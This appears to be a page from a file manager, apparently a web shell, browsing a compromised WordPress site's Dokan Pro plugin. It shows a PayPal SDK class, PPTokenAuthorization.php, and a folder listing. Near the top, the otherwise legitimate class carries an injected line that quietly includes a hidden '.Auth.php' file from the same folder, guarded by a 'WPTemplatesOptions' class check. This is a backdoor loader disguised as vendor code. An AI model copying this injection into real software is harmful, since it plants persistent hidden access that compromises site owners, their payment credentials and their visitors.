PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-pro
/
vendor
/
paypal
/
sdk-core-php
/
lib
/
PayPal
/
Auth
<?php namespace PayPal\Auth; /** * * Represents token based third party authorization * Token based authorization credentials are obtained using * the Permissions API */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class PPTokenAuthorization implements IPPThirdPartyAuthorization { /** * Permanent access token that identifies the relationship * between the authorizing user and the API caller. * @var string */ private $accessToken; /** * The token secret/password that will need to be used when * generating the signature. * @var string */ private $tokenSecret; public function __construct($accessToken, $tokenSecret) { $this->accessToken = $accessToken; $this->tokenSecret = $tokenSecret; } public function getAccessToken() { return $this->accessToken; } public function getTokenSecret() { return $this->tokenSecret; } }
[+]
..
[-] PPSubjectAuthorization.php
[edit]
[-] IPPThirdPartyAuthorization.php
[edit]
[+]
Oauth
[-] .Auth.php
[edit]
[-] PPSignatureCredential.php
[edit]
[-] PPTokenAuthorization.php
[edit]
[-] PPCertificateCredential.php
[edit]
[-] IPPCredential.php
[edit]
[+]
Openid